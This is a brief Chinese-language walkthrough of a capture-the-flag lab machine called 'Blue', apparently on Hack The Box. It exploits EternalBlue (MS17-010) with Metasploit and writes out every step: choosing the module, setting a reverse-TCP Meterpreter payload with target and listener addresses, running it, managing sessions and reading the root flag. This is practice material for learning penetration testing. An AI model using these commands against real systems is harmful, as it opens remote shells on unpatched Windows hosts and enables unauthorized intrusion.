本题非常简单,看靶机名称Blue
大致就猜测是永恒之蓝漏洞,直接msf
一把梭
# 打开msf 搜索相关 exp/poc
search ms17-010
# 使用 psexec 的
use 1
# 设置回连方式
set payload windows/x64/meterpreter/reverse_tcp
# 查看需要配置信息
show options
# 设置基本信息
set rhosts 10.10.10.40
set lhost 10.10.16.2
# 运行
run
此时获取了一个 meterpreter 会话,使用 shell
命令进入目标机器 shell
# 退出目标机器shell
exit
# 挂起会话
background
# 查看后台有哪些会话
sessions -i
# 重新进入某个会话
sessions -i 1
直接查看 flag 即可
root flag